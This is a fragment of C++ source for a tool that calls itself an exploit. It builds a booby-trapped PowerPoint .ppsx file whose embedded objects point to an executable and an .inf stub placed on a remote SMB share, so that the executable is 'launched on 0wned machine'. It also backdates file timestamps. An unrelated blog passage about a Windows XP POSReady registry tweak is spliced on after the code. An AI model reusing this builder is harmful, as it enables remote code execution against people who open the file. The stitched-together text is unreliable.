   for (long i = 1; i <= slidesCount; i ++) {

   VariantInitAsLong(varSlideIndex, i);

   CHK_HR( pSlides ->raw_Item( varSlideIndex, &pSlide) );

   VariantClear( &varSlideIndex );

   /* Get list of shapes
   */
   CHK_HR( pSlide ->get_Shapes( &pShapes) );

   /* Get count of shapes
   */
   CHK_HR( pShapes ->get_Count(&shapesCount) );

   /* Verify each shape
   */
   for (int j = 1; j <= shapesCount; j++) {

   VariantInitAsLong( varShapeIndex, j);

   CHK_HR( pShapes ->raw_Item( varShapeIndex, &pShape) );

   VariantClear( &varShapeIndex );

   CHK_HR( pShape ->get_AutoShapeType( &shapeType) );

   if (shapeType == Office::MsoAutoShapeType::msoShapeMixed) {

   CHK_HR( pShape ->get_OLEFormat(&pOLEFormat) );

   CHK_HR( pOLEFormat ->get_ProgID( &bstrProgId) );

   if (wcsicmp( L”Package”, bstrProgId) == 0) {

   *doesHave = true;
   }

   SAFE_FREE_BSTR_BY_REF( &bstrProgId );

   SAFE_RELEASE_BY_REF( &pOLEFormat );
   }

   SAFE_RELEASE_BY_REF( &pShape );

   if (*doesHave) {

   break;
   }
   }
   ///////////

   SAFE_RELEASE_BY_REF( &pShapes );

   SAFE_RELEASE_BY_REF( &pSlide );

   if (*doesHave) {

   break;
   }
   }

   bres = true;

   _Done:

   VariantClear( &varShapeIndex );

   VariantClear( &varSlideIndex );

   SAFE_FREE_BSTR_BY_REF( &bstrProgId );

   SAFE_RELEASE_BY_REF( &pOLEFormat );

   SAFE_RELEASE_BY_REF( &pShape );

   SAFE_RELEASE_BY_REF( &pShapes );

   SAFE_RELEASE_BY_REF( &pSlide );

   SAFE_RELEASE_BY_REF( &pSlides );

   return bres;
   }

   bool change_file_time(wchar_t *fname) {

   SYSTEMTIME systemTime = {0};
   HANDLE hFile = INVALID_HANDLE_VALUE;
   FILETIME fileTime = {0};

   GetSystemTime( &systemTime);

   systemTime.wYear = 1980;
   systemTime.wMonth = 1;
   systemTime.wDay = 1;
   systemTime.wHour = 15;
   systemTime.wMinute = 0;
   systemTime.wSecond = 0;

   hFile =
   CreateFileW(
   fname,
   FILE_WRITE_ATTRIBUTES,
   FILE_SHARE_READ | FILE_SHARE_WRITE,
   NULL,
   OPEN_EXISTING,
   FILE_ATTRIBUTE_NORMAL,
   NULL
   );

   if (hFile == NULL || hFile == INVALID_HANDLE_VALUE) {

   return false;
   }

   SystemTimeToFileTime( &systemTime, &fileTime);

   SetFileTime( hFile, &fileTime, &fileTime, &fileTime);

   CloseHandle(hFile);

   return true;
   }

   bool rewrite_embeddings_in_presentation(__in wchar_t *fnameZip, __in wchar_t *fnameData)
   /*++
   Oh fuck! Stupid Microsoft developers cann’t create human-relible
   API for zip management. 21st century! WTF? I cann’t use IShell
   interface for zip management, so use 3rd party zip archivers.
   –*/
   {

   bool bres = false;
   IShellDispatch *pShell = NULL;
   VARIANT varDir,
   varFile,
   varOption;
   Folder *pFolder = NULL;
   wstring stdWstrDir;

   VariantInit(&varDir);
   VariantInit(&varFile);
   VariantInit(&varOption);

   stdWstrDir.append(fnameZip);
   stdWstrDir.append(L”pptembeddings”);

   CHK_HR( CoCreateInstance( CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, IID_IShellDispatch, (LPVOID*)&pShell) );

   varDir.vt = VT_BSTR;
   varDir.bstrVal = _bstr_t(stdWstrDir.c_str());

   CHK_HR( pShell ->NameSpace(varDir, &pFolder) );

   varFile.vt = VT_BSTR;
   varFile.bstrVal = _bstr_t(fnameData);

   varOption.vt = VT_I4;
   varOption.lVal = FOF_NO_UI;

   CHK_HR( pFolder ->CopyHere( varFile, varOption) );

   Sleep( 1000 );

   bres = true;

   _Done:

   //VariantClear( &varOption );
   //VariantClear( &varFile );
   //VariantClear( &varDir );

   SAFE_RELEASE_BY_REF( &pFolder );

   SAFE_RELEASE_BY_REF( &pShell );

   return bres;
   }

   bool parse_cmd(
   __in int argc,
   wchar_t **argv,
   wstring *fnamePptIn,
   wstring *smbPath,
   wstring *fnameExe,
   wstring *fnameExeOnSmb,
   wstring *fnameInfOnSmb,
   bool *bForceUpload
   )
   {
   wstring stdOpt;
   bool bFnamePptIn = false,
   bSmbPath = false,
   bFnameExe = false,
   bFnameExeOnSmb = false,
   bFnameInfOnSmb = false;

   if (argc < 11) {

   print_usage_and_exit(argv[0]);

   return false;
   }

   for (int i = 1; i < argc; i++) {

   stdOpt.clear();

   stdOpt.append(argv[i]);

   if (stdOpt.compare(L”–force-upload”) == 0) {

   *bForceUpload = true;

   continue;
   }

   if ((i+1) >= argc) {

   printf(“[-] ERROR: malformed inputn”);

   return false;
   }

   if ( stdOpt.compare(L”-p”) == 0 ) {

   fnamePptIn ->clear();

   fnamePptIn ->append( argv[i+1]);

   i+=1;

   bFnamePptIn = true;

   continue;
   }

   if ( stdOpt.compare(L”-smb”) == 0 ) {

   smbPath ->clear();

   smbPath ->append( argv[i+1]);

   i+=1;

   bSmbPath = true;

   continue;
   }

   if ( stdOpt.compare(L”-ef”) == 0 ) {

   fnameExe ->clear();

   fnameExe ->append( argv[i+1]);

   i+=1;

   bFnameExe = true;

   continue;
   }

   if ( stdOpt.compare(L”-eof”) == 0 ) {

   fnameExeOnSmb ->clear();

   fnameExeOnSmb ->append( argv[i+1]);

   i+=1;

   bFnameExeOnSmb = true;

   continue;
   }

   if ( stdOpt.compare(L”-iof”) == 0 ) {

   fnameInfOnSmb ->clear();

   fnameInfOnSmb ->append( argv[i+1]);

   i+=1;

   bFnameInfOnSmb = true;

   continue;
   }
   }

   if (!bFnamePptIn || !bSmbPath || !bFnameExe || !bFnameExeOnSmb || !bFnameInfOnSmb) {

   printf(“[-] ERROR: Not all options specifiedn”);

   return false;
   }

   return true;
   }

   void print_usage_and_exit(wchar_t *exe) {

   wprintf(
   L” **************************************************************** n”
   L”[?] Usage: %s [option|[option]…] n”
   L” **************************************************************** n”
   L” options: n”
   L” -p – path to input PowerPoint presentation file; n”
   L” -smb – UNC path on remote server in which files should be n”
   L” placed, f.e: 192.168.3.100public ; n”
   L” -ef – path to executable file to be launched on 0wned n”
   L” machine; content of file ‘ll be stored into -eof n”
   L” file; n”
   L” -eof – name of file into which -ef file’s content to be n”
   L” stored; exploit uploads this file onto -smb path n”
   L” automatically; make sure that -eof file is located n”
   L” on remote server before exploitation phase; n”
   L” -iof – name of .inf file to be stored on remote server; n”
   L” exploit extracts .inf stub from self and stores into n”
   L” file on remote host automatically; make sure that n”
   L” this file exists on remote server before exploitation n”
   L” phase; n”
   L” –force-upload n”
   L” – specifies explicit file’s uploading to remote server; n”
   L” **************************************************************** n”
   L” EXAMPLE: n”
   L” -p a.pptx -smb 192.168.0.1public -ef E:stub.exe n”
   L” -eof Config.xml -iof Preview.inf –force-upload n”
   L” creates a.pptx.saved.ppsx file from a.pptx; n”
   L” stores stub.exe into 192.168.0.1publicConfig.xml; n”
   L” stores .inf stub into 192.168.0.1publicPreview.inf; n”
   L” **************************************************************** n”
   L” NOTES: n”
   L” -smb, -iof, -eof are written into presentations, so make sure n”
   ” that specified things exist in real life; n”
   L” **************************************************************** n”,
   exe);

   ExitProcess(0);
   }

   /* EOF
   */

The registry addition tricks Microsoft into thinking your PC is running the Point Of Sale “Embedded” version of Windows, which will continue to have updates until 2019. The change only works on 32-bit systems, not 64-bit. Microsoft warns this is a bad idea and suggests, naturally, you replace the operating system with Windows 7 or higher. If you make this change to an XP machine, you do this at your own risk. To make the change:

Make sure your computer is properly backed up in case anything goes wrong. Then, open Notepad to create a new text document.

Paste in the following text:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMWPAPosReady]  "Installed"=dword:00000001

Save the text file, but change its extension from .txt. to .reg.

Double-click your newly-created .reg file to make the tweak.

If you have a system that you can’t quite get rid of yet, this could make it last a bit longer. Hit the link below to read more about the tweak.